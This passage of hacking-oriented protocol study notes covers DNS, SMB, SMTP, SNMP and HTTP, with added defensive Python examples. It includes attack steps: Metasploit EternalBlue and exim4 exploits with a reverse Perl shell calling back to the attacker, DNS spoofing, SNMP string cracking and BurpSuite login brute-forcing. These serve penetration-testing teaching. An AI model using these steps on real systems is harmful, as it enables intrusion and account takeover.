  • Queries use UDP port 53 — fast, lightweight
  • Zone transfers use TCP port 53 — reliable for full DB sync

# Look up DNS records
dig hackers-arise.com
dig hackers-arise.com MX          # Mail records
dig hackers-arise.com NS          # Name server records
nslookup hackers-arise.com        # Alternative tool

DNS Security & Vulnerabilities

DNS Spoofing / Cache Poisoning

Inject false DNS records into a resolver's cache → redirect traffic to the attacker's server.

# Tool: dnsspoof (intercept local DNS queries on LAN)
dnsspoof -i eth0 -f spoofhosts
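To see why a forged answer has to match more than just the name, here is an added example (not code from the book or these notes) that builds the UDP wire format of the query and response from "How DNS Works" by hand and then applies the check a resolver must make before it caches anything: the response must carry the query's 16-bit transaction ID and echo the same question. The IP for hackers-arise.com is the one quoted in these notes; the transaction IDs and the forged replies are constructed.

```python
# Added example (not code from the book or these notes): DNS wire format by
# hand. A query and answer for hackers-arise.com (IP taken from the notes) are
# built, then checked the way a resolver must check them: transaction ID and
# question must match. Transaction IDs and the forged packets are constructed.
import struct

def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(msg: bytes, off: int):
    """Decode a (possibly compressed) name at msg[off]; return (name, next_offset)."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:                          # compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length

def build_query(txid: int, name: str) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)    # RD=1, one question
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # type A, class IN

def build_a_response(txid: int, name: str, ip: str, ttl: int = 300) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)    # QR=1 RD=1 RA=1
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4)    # name = pointer to offset 12
    answer += bytes(int(o) for o in ip.split("."))
    return header + question + answer

def parse_message(msg: bytes) -> dict:
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    qname, off = decode_name(msg, off)
    qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
    off += 4
    answers = []
    for _ in range(an):
        rname, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((rname, ".".join(str(b) for b in rdata), ttl))
    return {"txid": txid, "is_response": bool(flags & 0x8000),
            "qname": qname, "qtype": qtype, "answers": answers}

def accept_response(query: bytes, response: bytes):
    """Resolver-side check. Returns the A records, or None if the response does not
    belong to this query (wrong transaction ID, not a response, question differs)."""
    q, r = parse_message(query), parse_message(response)
    if not r["is_response"] or r["txid"] != q["txid"] or r["qname"] != q["qname"]:
        return None
    return r["answers"]

QUERY = build_query(0x1234, "hackers-arise.com")
GOOD_REPLY = build_a_response(0x1234, "hackers-arise.com", "23.236.62.147")
# A forged reply that guessed the transaction ID wrong is dropped ...
BAD_GUESS = build_a_response(0x9999, "hackers-arise.com", "192.168.1.114")
# ... but one that guessed right is accepted: the ID is only 16 bits, which is
# why resolvers also randomise the UDP source port and why DNSSEC exists.
LUCKY_GUESS = build_a_response(0x1234, "hackers-arise.com", "192.168.1.114")
```

The LUCKY_GUESS case is the whole cache-poisoning problem in one line: the only things protecting a UDP resolver from an off-path forger are the transaction ID, the source port and the race against the real answer. A tool on the same LAN (the dnsspoof case above) sees the query, so it does not even have to guess. DNSSEC signatures, covered below, are what let the resolver reject a forged answer regardless of who wins the race.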

Zone Transfer Attack

If misconfigured, an attacker can download the entire DNS zone (all records).

# Attempt zone transfer
dig axfr @<dns-server> <domain>

DoS Against DNS

DNS DoS = especially devastating because it makes the whole internet unusable (can't resolve anything).

Iranian Hackers DNS Attack (2019)

Attackers used 3 techniques:

  1. Changed DNS A records via managed DNS provider credentials
  2. Changed DNS NS records via TLD provider credentials
  3. Deployed an "attacker operations box" — internal queries → malicious server, external → real server

DNSSec

DNS Security Extensions — adds digital signatures to DNS responses.

  • Each DNS zone has a public/private key
  • Resolvers use the public key to verify data authenticity
  • Prevents zone transfer poisoning and data alteration

Without DNSSec: DNS is based on UDP (connectionless) — easily spoofed.


Building a BIND DNS Server

BIND = Berkeley Internet Domain System — the most widely used DNS server on the internet.

# Install
sudo apt-get install bind9
# or from source:
git clone https://gitlab.isc.org/isc-projects/bind9.git

# Configuration files at /etc/bind/
# named.conf.options  — global settings
# named.conf.local    — zone definitions

# Edit options
sudo leafpad /etc/bind/named.conf.options
# Set: listen-on port 53; allow-query; forwarders; recursion yes;

# Create forward zone file
cp /etc/bind/db.local /etc/bind/forward.yourdomain.local

# Create reverse zone file
cp /etc/bind/db.127 /etc/bind/reverse.yourdomain.local

# Restart service
sudo service bind9 restart
sudo systemctl restart bind9

⚡ Exercises

  1. Open your hosts file with a text editor.
  2. Build a BIND DNS server for your local domain.
  3. Search the CVE database for recent DNS vulnerabilities.


Chapter 9 — Server Message Block (SMB)


What is SMB?

SMB (Server Message Block) — Application layer (Layer 7) protocol for:

  • File sharing
  • Printer sharing
  • Named pipe sharing
  • Port sharing

Client-server, request-response protocol. Enables users/apps to share resources across a LAN.
SMB over TCP/IP uses port 445.

Originally developed by IBM (1980s), adopted and extended by Microsoft for Windows.

Client ──── request ────► SMB Server
Client ◄─── response ─── SMB Server
(via TCP/IP or NetBIOS)

CIFS vs SMB

| Term | Description |
|------|-------------|
| SMB | The protocol (current: SMB 2.0, 3.0) |
| CIFS | Common Internet File System — old Microsoft dialect of SMB (obsolete) |

  • SMB 2.0 → introduced with Windows Vista (2006)
  • SMB 3.0 → introduced with Windows 8 and Server 2012

SMB Vulnerabilities

SMB has been the source of two of the most critical Windows vulnerabilities in history:

| Exploit | CVE | Impact |
|---------|-----|--------|
| MS08-067 | CVE-2008-4250 | Remote code execution — Windows XP/Server 2003. Compromised millions. |
| EternalBlue | MS17-010 | NSA-developed exploit. Used by WannaCry and Petya ransomware. |

Both allow attackers to send crafted packets to SMB → execute remote code with SYSTEM privileges.

# Search Metasploit for SMB exploits
msf > search type:exploit smb

# Use EternalBlue
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS <target-IP>
msf > run

Building a Samba Server (Linux SMB)

Samba = Linux/Unix implementation of SMB. Lets Linux share files with Windows systems.

# Install
sudo apt-get install samba

# Start service (daemon name is "smbd")
sudo service smbd start

# Configure — edit /etc/samba/smb.conf
sudo leafpad /etc/samba/smb.conf

Add to the end of smb.conf:

[HackersArise_share]
   comment = Samba on Hackers-Arise
   path = /home/OTW/HackersArise_share
   read only = no
   browsable = yes
# Create the shared directory
sudo mkdir /home/OTW/HackersArise_share

# Give all users access
sudo chmod 777 /home/OTW/HackersArise_share

# Restart to apply changes
sudo service smbd restart

Access from Windows:

\\192.168.1.101\HackersArise_share
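The share above is writable by every user and sits on a chmod 777 directory, which is fine for a lab and bad anywhere else. As an added example (not code from the book or these notes), here is a small smb.conf audit that reads the share stanza with Python's configparser and flags writable shares that have no user restriction; WEAK_CONF repeats the stanza from these notes under a constructed [global] section, and HARDENED_CONF is one hardened form of the same share (the user name otw and the masks are assumptions).

```python
# Added example (not code from the book or these notes): audit a smb.conf for
# shares that anyone can write to. WEAK_CONF extends the share from the notes
# with a constructed [global] section; HARDENED_CONF is a suggested replacement.
import configparser

WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[HackersArise_share]
   comment = Samba on Hackers-Arise
   path = /home/OTW/HackersArise_share
   read only = no
   browsable = yes
"""

HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = Never
   server min protocol = SMB3

[HackersArise_share]
   comment = Samba on Hackers-Arise
   path = /home/OTW/HackersArise_share
   read only = no
   browsable = yes
   guest ok = no
   valid users = otw
   create mask = 0660
   directory mask = 0770
"""

def _is_yes(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")

def audit_smb_conf(text: str) -> dict:
    """Return {share_name: [issues]} for every non-global share in the config."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    glob = cp["global"] if cp.has_section("global") else {}
    findings = {}
    for share in cp.sections():
        if share in ("global", "printers", "print$"):
            continue
        s = cp[share]
        issues = []
        writable = (not _is_yes(s.get("read only", "yes"))) or _is_yes(s.get("writable", "no"))
        guest_mapped = glob.get("map to guest", "Never").strip().lower() != "never"
        guest = _is_yes(s.get("guest ok", "no")) or guest_mapped
        if writable and "valid users" not in s:
            issues.append("writable with no 'valid users' restriction")
        if guest:
            issues.append("guest access possible (guest ok / map to guest)")
        if writable and "create mask" not in s:
            issues.append("no 'create mask': new files get the default permissions")
        findings[share] = issues
    return findings

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_smb_conf(conf))
```

With `valid users` in place the chmod 777 on the directory is no longer needed either: ownership by the listed user plus the create/directory masks is enough for Samba to write files.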

Metasploit SMB Search

msf > search type:exploit smb

Notable exploits in the list:

  • exploit/windows/smb/ms08_067_netapi — MS08-067 (Windows XP/Server 2003)
  • exploit/windows/smb/ms17_010_eternalblue — EternalBlue (Windows 7/Server 2008)
  • Multiple Samba exploits for Linux

⚡ Exercises

  1. Build a Samba server and share a directory on your LAN.


Chapter 10 — SMTP (Simple Mail Transfer Protocol)


What is SMTP?

SMTP (Simple Mail Transfer Protocol) — transfers email between users.
First codified in 1983. Still the same core protocol today (with enhancements).

Email Port Map

| Port | Protocol | Use |
|------|----------|-----|
| 25 | SMTP | Server-to-server (MTA ↔ MTA) |
| 587 | SMTP | Client submission (MUA → MSA) |
| 110 | POP3 | Download email from server |
| 143 | IMAP | Access email on server |

Email Processing Model

[Sender: Ana]                                    [Receiver: Lav]
    │                                                  │
   MUA (Outlook/Thunderbird)                      MUA (reads email)
    │ SMTP port 587                                    │
   MSA/MTA (mail server)                         MDA (local delivery)
    │ SMTP port 25                                     │
    └──────────────────────────────────────────► MTA (target mail server)
                   (MTA uses DNS MX lookup to find target)

Key agents:

| Agent | Name | Role |
|-------|------|------|
| MUA | Mail User Agent | Email client (Outlook, Thunderbird) |
| MSA | Mail Submission Agent | Accepts email from the MUA |
| MTA | Mail Transfer Agent | Routes email between servers |
| MDA | Mail Delivery Agent | Delivers to the local recipient mailbox |

Popular Linux MTAs: sendmail, EXIM, postfix
Windows: Microsoft Exchange Server


SMTP Communication Flow (Wireshark)

Packet 1-3:  TCP 3-way handshake (client → SMTP server)
Packet 4:    Server identifies itself + SMTP banner
Packet 5:    Client sends EHLO (initiate SMTP session)
Packet 8:    Client identifies sender (MAIL FROM)
Packet 10:   Client identifies receiver (RCPT TO)
...          DATA → message content → . (end)
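The same exchange, with both sides' lines, as an added example (not code from the book or these notes): a minimal SMTP server-side state machine that answers EHLO, MAIL FROM, RCPT TO, DATA and the terminating "." with the usual reply codes. It also shows the one policy decision that matters most on a mail server you build yourself (the Exim4 wizard below asks about it as "relay domains"): it accepts mail only for the domains it is responsible for and refuses to relay for anyone else. Hostnames, addresses and the transcript are constructed.

```python
# Added example (not code from the book or these notes): a minimal SMTP
# server-side state machine that walks the same EHLO / MAIL FROM / RCPT TO /
# DATA / "." exchange the Wireshark capture shows, and refuses to relay for
# domains it is not responsible for. Hostnames, addresses and the transcript
# are constructed for the demonstration.
LOCAL_DOMAINS = {"hackers-arise.com"}

def _address(arg: str) -> str:
    """'FROM:<ana@example.com>' -> 'ana@example.com'"""
    return arg.split(":", 1)[1].strip().strip("<>")

class SmtpSession:
    def __init__(self, hostname="mail.hackers-arise.com"):
        self.hostname = hostname
        self.helo = None
        self.in_data = False
        self.delivered = []          # (mail_from, [rcpts], body) once "." is seen
        self._reset_envelope()

    def _reset_envelope(self):
        self.mail_from = None
        self.rcpt_to = []
        self.body = []

    def greeting(self) -> str:
        return f"220 {self.hostname} ESMTP ready"

    def handle(self, line: str):
        """Process one client line; return the server reply (None while reading DATA)."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                self.delivered.append((self.mail_from, list(self.rcpt_to), "\n".join(self.body)))
                self._reset_envelope()
                return "250 OK: queued"
            self.body.append(line[1:] if line.startswith("..") else line)   # undo dot-stuffing
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("EHLO", "HELO"):
            self.helo = arg.strip()
            return f"250 {self.hostname} Hello {self.helo}"
        if verb == "MAIL":
            if self.helo is None:
                return "503 Send EHLO first"
            self.mail_from = _address(arg)
            return "250 OK"
        if verb == "RCPT":
            if self.mail_from is None:
                return "503 Need MAIL FROM first"
            rcpt = _address(arg)
            if rcpt.rsplit("@", 1)[-1].lower() not in LOCAL_DOMAINS:
                return "554 Relay access denied"     # this is what keeps it from being an open relay
            self.rcpt_to.append(rcpt)
            return "250 OK"
        if verb == "DATA":
            if not self.rcpt_to:
                return "503 Need RCPT TO first"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Command not recognised"

def run_transcript(client_lines):
    """Feed client lines to a fresh session; return (session, [(who, line), ...])."""
    session = SmtpSession()
    log = [("S", session.greeting())]
    for line in client_lines:
        log.append(("C", line))
        reply = session.handle(line)
        if reply is not None:
            log.append(("S", reply))
    return session, log

SAMPLE_CLIENT = [
    "EHLO laptop.example.com",
    "MAIL FROM:<ana@example.com>",
    "RCPT TO:<lav@hackers-arise.com>",
    "RCPT TO:<someone@other.example>",      # relay attempt, must be refused
    "DATA",
    "Subject: hello",
    "",
    "..starts with a dot",                  # dot-stuffed by the client
    ".",
    "QUIT",
]

if __name__ == "__main__":
    _, log = run_transcript(SAMPLE_CLIENT)
    for who, line in log:
        print(f"{who}: {line}")
```

Everything here travels in cleartext, which is why a packet capture on port 25 shows the sender, recipient and body as readable text; STARTTLS on the same port, or submission over 587 with TLS, is what hides it from the wire.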

Building an SMTP Server (Exim4)

# Install exim4
sudo apt install exim4

# Run configuration wizard
sudo dpkg-reconfigure exim4-config

Wizard questions:

  1. Mail server type → "internet site" (send/receive across the internet)
  2. Domain name → your domain (e.g. hackers-arise.com)
  3. IP to listen on → your server IP
  4. Local recipient domains → leave as default
  5. Relay domains → leave blank
  6. Local mail delivery → mbox or home directory
  7. Minimize DNS lookups → YES
  8. Relay domains → leave blank
  9. Split config file → NO (unsplit = more stable)

# Start exim4
sudo service exim4 start

SMTP Reconnaissance

# Scan SMTP port with service detection
nmap -sT -A 192.168.56.103 -p25

# Run all SMTP nmap scripts (user enumeration, vuln scan)
nmap --script=smtp-* 192.168.56.103 -p 25

Output may show:

  • Users enumerated (for social engineering)
  • CVE vulnerabilities (e.g. CVE-2010-4344 for exim4)

Exploiting SMTP with Metasploit

# Launch Metasploit
msfconsole

# Search for exim exploits
msf5 > search type:exploits exim

# Use the exim4 string format exploit
msf5 > use exploit/unix/smtp/exim4_string_format

# Get exploit info
msf5 > info

# Set target
msf5 > set RHOSTS 192.168.56.103

# Set payload (reverse Perl shell)
msf5 > set PAYLOAD cmd/unix/reverse_perl

# Set callback port (443 = HTTPS port, often allowed through firewalls)
msf5 > set LPORT 443
msf5 > set LHOST <your-IP>

# Fire!
msf5 > exploit

If successful → you get a shell session. Verify with Linux commands:

id         # Should show uid=0 (root)
whoami     # root
pwd        # /var/spool/exim4
uname -a   # System info

Note: Linux shells from Metasploit have NO prompt — just an empty line. Type commands anyway.


Notable SMTP Vulnerabilities

| Year | Target | Impact |
|------|--------|--------|
| 2021 | Microsoft Exchange Server | Chinese hackers accessed large corps' email (FBI authorized to patch US systems) |
| 2020 | Exim mail servers | Two severe vulns allowing unauthorized email access |

⚡ Exercises

  1. Build an SMTP server (Exim4) for your domain.
  2. Run nmap --script=smtp-* against your new server and review the output.


Chapter 11 — SNMP (Simple Network Management Protocol)


What is SNMP?

SNMP manages and monitors network devices (routers, switches, printers, servers).
If an attacker gains access to SNMP, they can:

  • Harvest vast information about every device on the network
  • Disable or reconfigure routers and switches
  • Unmask encrypted VPN communications (NSA ExtraBacon exploit)

Uses UDP ports 161 and 162.


SNMP Architecture

           SNMP Manager (admin computer)
               │  UDP 161/162
    ┌──────────┼──────────┐
    ▼          ▼          ▼
 [Router]  [Switch]  [Server]   ← each runs an SNMP Agent
    └──────────┴──────────┘
              MIB
   (Management Information Base)
   Contains: users, software, OS, open ports, configs...

The MIB = hierarchical database holding everything about every managed device.


SNMP Versions

| Version | Security | Notes |
|---------|----------|-------|
| SNMPv1 | Very poor | Cleartext. Default community strings: public (read) / private (write). Still widely used. |
| SNMPv2 | Slightly better | Not backward-compatible → not widely adopted |
| SNMPv3 | Strong | Encryption + integrity + auth. Not yet universal |

⚠️ Even if the strings are changed, SNMPv1 is cleartext — sniff the wire to grab them.


SNMP PDU Types

| PDU | Purpose |
|-----|---------|
| GetRequest | Request info from agent |
| SetRequest | Set a value on agent |
| GetNextRequest | Walk through MIB |
| GetBulkRequest | Get large chunks |
| Response | Agent reply |
| Trap | Unsolicited agent alert |
| InformRequest | Manager to manager |
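To make the "cleartext" point in the versions table concrete, here is an added example (not code from the book or these notes) that encodes an SNMPv1 GetRequest for sysDescr.0 in BER, exactly as it leaves the manager on UDP 161, and a dissector that pulls the version, community string, PDU type and OIDs back out of the bytes. The community string is an ordinary OCTET STRING in the packet, which is all a sniffer needs to find it. Community, OID and request ID are constructed values.

```python
# Added example (not code from the book or these notes): encode and decode an
# SNMPv1 GetRequest in BER, the raw form that travels in UDP port 161. The
# community string sits in the packet as a plain OCTET STRING, which is exactly
# what the sniffing note above relies on. Community, OID and request id are constructed.
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "Response",
             0xA3: "SetRequest", 0xA4: "Trap", 0xA5: "GetBulkRequest", 0xA6: "InformRequest"}

def _length(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + _length(len(payload)) + payload

def ber_int(v: int) -> bytes:
    size = (v.bit_length() + 8) // 8          # minimal two's-complement length
    return _tlv(0x02, v.to_bytes(size, "big", signed=True))

def ber_octets(s: str) -> bytes:
    return _tlv(0x04, s.encode())

def ber_null() -> bytes:
    return b"\x05\x00"

def ber_oid(oid: str) -> bytes:
    parts = [int(p) for p in oid.split(".")]
    body = bytes([40 * parts[0] + parts[1]])  # first two arcs share one byte
    for p in parts[2:]:
        chunk = [p & 0x7F]                    # base-128, high bit = more follows
        p >>= 7
        while p:
            chunk.append(0x80 | (p & 0x7F))
            p >>= 7
        body += bytes(reversed(chunk))
    return _tlv(0x06, body)

def ber_seq(tag: int, *items: bytes) -> bytes:
    return _tlv(tag, b"".join(items))

def build_get_request(community: str, oid: str, request_id: int) -> bytes:
    varbind = ber_seq(0x30, ber_oid(oid), ber_null())
    pdu = ber_seq(0xA0, ber_int(request_id), ber_int(0), ber_int(0), ber_seq(0x30, varbind))
    return ber_seq(0x30, ber_int(0), ber_octets(community), pdu)      # version 0 = SNMPv1

def _read_tlv(buf: bytes, off: int):
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, buf[off:off + length], off + length

def _decode_oid(body: bytes) -> str:
    parts, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(value)
            value = 0
    return ".".join(map(str, parts))

def parse_snmp(packet: bytes) -> dict:
    """Dissect an SNMPv1/v2c message: version, community, PDU type, request id, OIDs."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, off = _read_tlv(msg, 0)
    _, community, off = _read_tlv(msg, off)
    pdu_tag, pdu, _ = _read_tlv(msg, off)
    _, request_id, p = _read_tlv(pdu, 0)
    _, _err, p = _read_tlv(pdu, p)
    _, _idx, p = _read_tlv(pdu, p)
    _, varbinds, _ = _read_tlv(pdu, p)
    oids, q = [], 0
    while q < len(varbinds):
        _, vb, q = _read_tlv(varbinds, q)
        _, oid, _ = _read_tlv(vb, 0)
        oids.append(_decode_oid(oid))
    return {"version": {0: "v1", 1: "v2c"}.get(int.from_bytes(version, "big"), "other"),
            "community": community.decode(),
            "pdu": PDU_NAMES.get(pdu_tag, "unknown"),
            "request_id": int.from_bytes(request_id, "big", signed=True),
            "oids": oids}

SYS_DESCR = "1.3.6.1.2.1.1.1.0"
SAMPLE = build_get_request("public", SYS_DESCR, 42)
```

Run against a packet capture, parse_snmp is the detection side of onesixtyone: every community string that crosses the wire in v1/v2c is recoverable this way, and a SetRequest (0xA3) seen from an address that is not the management station is worth an alert. SNMPv3 with authPriv wraps the PDU in an encrypted scoped PDU, so the same dissector returns "other" for the version and cannot see inside.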

Abusing SNMP — snmpcheck

# Dump MIB info (default: public string, SNMPv1)
snmpcheck -t <target-IP>

# Custom community string
snmpcheck -t <target-IP> -c <community-string>

Output includes:

  • Hardware info
  • OS + uptime (check if patched)
  • Storage info
  • User accounts (use for password attacks)
  • Software installed (find exploitable versions)

Cracking SNMP Community Strings — onesixtyone

# View built-in dictionary
cat /usr/share/doc/onesixtyone/dict.txt

# Crack community string
onesixtyone 192.168.1.102 -c /usr/share/doc/onesixtyone/dict.txt

If found, use the cracked strings with snmpcheck to pull the full MIB.

💡 Tip: Add company-name variations to your wordlist — lazy admins often use company-related strings.


NSA ExtraBacon

Snowden documents confirmed NSA exploited SNMP to unmask encrypted Cisco VPN traffic. Patched by Cisco, but the NSA likely has further SNMP-based exploits.


Quick Reference

snmpcheck -t <IP>                          # Dump MIB
onesixtyone <IP> -c dict.txt               # Crack community string
nmap -sU -p 161 <IP>                       # Check SNMP port
nmap -sU -p 161 --script=snmp-info <IP>    # SNMP info via nmap


Chapter 12 — HTTP


HTTP Protocol

HyperText Transfer Protocol — core communication protocol of the web.
Message-based: client sends a request, server sends a response. Connectionless but uses TCP.


HTTP Request Structure

GET /index.html HTTP/1.1          ← Method + URL + Version
Host: www.example.com             ← Headers
User-Agent: Mozilla/5.0
Accept: text/html
                                  ← Blank line
                                  ← Optional body

First line elements:

  1. Method (GET, POST, etc.)
  2. URL
  3. HTTP version

HTTP Methods

| Method | Purpose |
|--------|---------|
| GET | Retrieve a resource |
| POST | Submit data / perform actions |
| HEAD | Like GET but no body returned |
| PUT | Upload a resource |
| OPTIONS | Ask the server what methods are available |
| TRACE | Diagnostic — echoes the request back |

HTTP Status Codes

| Code | Category | Common Examples |
|------|----------|-----------------|
| 1xx | Informational | 100 Continue |
| 2xx | Success | 200 OK, 201 Created |
| 3xx | Redirect | 301 Moved Permanently, 302 Found, 304 Not Modified |
| 4xx | Client Error | 400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found |
| 5xx | Server Error | 500 Internal Server Error, 503 Service Unavailable |

HTTP Headers (Key Ones)

Request Headers

| Header | Purpose |
|--------|---------|
| Host | Target h​ostname |
| User-Agent | Browser/client identifier |
| Cookie | Submits stored cookies |
| Authorization | Submits credentials |
| Referer | URL of the referring page |
| Accept | Content types accepted |

Response Headers

| Header | Purpose |
|--------|---------|
| Set-Cookie | Issues a cookie to the client |
| Server | Web server software (e.g. Apache, nginx) |
| Location | Redirect target (3xx responses) |
| WWW-Authenticate | Auth type supported |
| Content-Type | MIME type of the body |
| X-Frame-Options | Clickjacking protection |

Cookies

  • Server issues via the Set-Cookie response header
  • Client stores and sends it back on future requests
  • Used to maintain session state (e.g. logged-in status)
  • Name/value pairs, no spaces

Set-Cookie: Tracking=wdr66gyU34pli89
Cookie: Tracking=wdr66gyU34pli89      ← client sends it back on the next request

🎯 Attack: Steal cookies → impersonate the user (session hijacking). Use Wireshark or BurpSuite to intercept.


URL Structure

protocol://hostname[:port]/[/path/]file[?param=value]

https://www.hackers-arise.com:443/login?user=admin
  │          │                │    │        │
  protocol   hostname         port path     parameter

Port is optional — only needed if different from the default (http=80, https=443).


HTTPS

HTTP tunneled over SSL/TLS → encrypted → protects confidentiality and integrity.
Without HTTPS, traffic is cleartext → vulnerable to MitM interception.


HTTP Authentication Types

| Type | Method |
|------|--------|
| Basic | Base64-encoded credentials in the header (NOT encrypted — easily decoded) |
| NTLM | Challenge-response mechanism |
| Digest | Challenge-response using MD5 + nonce |
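Two of the points above (Basic auth is only base64, and a stolen cookie is a stolen session) are easiest to see with a parser in hand. As an added example (not code from the book or these notes), here is a raw HTTP request parser, a Basic-auth decoder that recovers the credentials from the header the way anyone on a cleartext path could, and a Set-Cookie audit that reports the attributes whose absence makes the cookie easy to steal or replay. The request, credentials and cookie strings are constructed (the Tracking cookie value is the one from these notes).

```python
# Added example (not code from the book or these notes): parse a raw HTTP
# request, show that Basic authentication is only base64 (decodable by anyone
# on the wire), and audit a Set-Cookie header for the attributes that limit
# cookie theft. The request, credentials and cookie values are constructed.
import base64

def parse_http_request(raw: str) -> dict:
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, url, version = lines[0].split(" ", 2)       # request line: method, URL, version
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return {"method": method, "url": url, "version": version, "headers": headers, "body": body}

def decode_basic_auth(header_value: str):
    """'Basic YWRtaW46bGV0bWVpbg==' -> ('admin', 'letmein'); None for other schemes."""
    scheme, _, blob = header_value.partition(" ")
    if scheme.lower() != "basic":
        return None
    user, _, password = base64.b64decode(blob).decode("utf-8").partition(":")
    return user, password

def audit_set_cookie(header_value: str):
    """Return (cookie_name, [findings]) for one Set-Cookie header value."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].partition("=")[0]
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.lower()] = v or True                      # flag attributes have no value
    findings = []
    if "secure" not in attrs:
        findings.append("no Secure: also sent over plain HTTP, sniffable")
    if "httponly" not in attrs:
        findings.append("no HttpOnly: readable by script, so XSS becomes session theft")
    samesite = attrs.get("samesite")
    if not isinstance(samesite, str) or samesite.lower() not in ("lax", "strict"):
        findings.append("no SameSite=Lax/Strict: sent on cross-site requests (CSRF)")
    return name, findings

# Constructed request: a Basic-auth login plus the cookie from the notes.
SAMPLE_REQUEST = (
    "GET /admin HTTP/1.1\r\n"
    "Host: www.hackers-arise.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Authorization: Basic " + base64.b64encode(b"admin:letmein").decode() + "\r\n"
    "Cookie: Tracking=wdr66gyU34pli89\r\n"
    "\r\n"
)
WEAK_COOKIE = "Tracking=wdr66gyU34pli89"
HARDENED_COOKIE = "Tracking=wdr66gyU34pli89; Secure; HttpOnly; SameSite=Lax; Path=/"

if __name__ == "__main__":
    req = parse_http_request(SAMPLE_REQUEST)
    print(req["method"], req["url"], decode_basic_auth(req["headers"]["authorization"][0]))
    for cookie in (WEAK_COOKIE, HARDENED_COOKIE):
        print(audit_set_cookie(cookie))
```

Neither check replaces HTTPS: Secure keeps the cookie off plain HTTP and HttpOnly keeps it away from injected script, but Basic credentials are readable by anyone in the path until the connection is TLS.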

HTTP Proxies

A proxy sits between client browser and web server:

Browser → Proxy → Internet → Web Server
Browser ← Proxy ← Internet ← Web Server

Used for: access control, caching, authentication, content filtering.
BurpSuite acts as an intercepting proxy for web app hacking.


Hacking Web App Authentication — BurpSuite

Setup

  1. Launch BurpSuite (built into Kali): burpsuite &
  2. Create Temporary Project → Use Burp Defaults → Start Burp
  3. Enable Proxy → Intercept
  4. In Firefox: Preferences → Network → Manual proxy → 127.0.0.1:8080

Attack 1 — Sniper (Known Username)

Target: Crack the password for a known username

1. Browse to the login page (e.g. DVWA)
2. Enter any username + password → BurpSuite intercepts the request
3. Right-click → Send to Intruder
4. Positions tab → Clear → highlight the password field → Add
5. Attack type: Sniper
6. Payloads tab → add a password list (top10000passwords.txt)
7. Start Attack
8. Look for a response with a different Status or Length → successful login!

Attack 2 — Cluster Bomb (Unknown Username & Password)

Target: Crack both username AND password

1. Same setup, but highlight BOTH the username and password fields
2. Attack type: Cluster Bomb
3. Payload Set 1: username wordlist
4. Payload Set 2: password wordlist + enable Character Substitution
   (a=4, b=8, e=3 etc. — common "l33t speak" substitutions)
5. Start Attack → works through all combinations
6. ~2 billion attempts — look for Status 200 or a different Length

Character substitution munges passwords to handle common letter-number substitutions users make.

Reading results: All failed attempts = same Status code (302) + same Length. Successful login = different Status (200) or different Length.
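The same "302 for every failure, 200 for the hit" pattern that makes the Intruder results readable is what makes the attack visible on the server. As an added example (not code from the book or these notes), here is the defender's side: a parser for Apache/nginx-style access log lines and a detector that flags any source address POSTing to the login page more than a threshold number of times inside a time window, counting 302s as failures and noting whether a 200 appeared in the burst. The log lines, IPs and the /login.php path are constructed.

```python
# Added example (not code from the book or these notes): the server-side view of
# the Intruder attacks above. A few constructed Apache/nginx-style access log
# lines are scanned for bursts of POSTs to the login page; as the notes say,
# failures come back as 302 and a success as 200, so the two are counted separately.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

def parse_access_line(line: str):
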